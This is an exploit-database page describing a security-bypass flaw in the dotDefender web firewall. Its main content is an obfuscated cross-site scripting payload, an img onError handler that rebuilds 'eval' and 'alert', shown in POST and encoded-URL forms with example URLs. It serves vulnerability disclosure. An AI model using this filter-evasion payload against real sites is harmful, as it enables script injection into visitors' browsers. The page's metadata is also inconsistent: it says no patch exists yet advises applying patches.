Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
dotDefender Security Bypass Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
dotDefender
by:
7.5
CVSS
HIGH
Security Bypass
Bypass of Security Controls
CWE
Product Name: dotDefender
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

dotDefender Security Bypass Vulnerability

dotDefender fails to restrict malicious data from reaching protected sites, allowing remote attackers to bypass security restrictions and launch cross-site scripting attacks.

Mitigation:

Apply patches or updates provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41560/info

dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites.

Remote attackers can exploit this issue to bypass security restrictions and to launch cross-site scripting attacks. 

<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
.source
)" /> //POST

<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
h%2Bn)(
/0wn3d/.source)" /> //GET

EXAMPLES:

Blocked:
http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E

Unblocked:
http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E

Navigation

Suggest Exploit

Services By CQR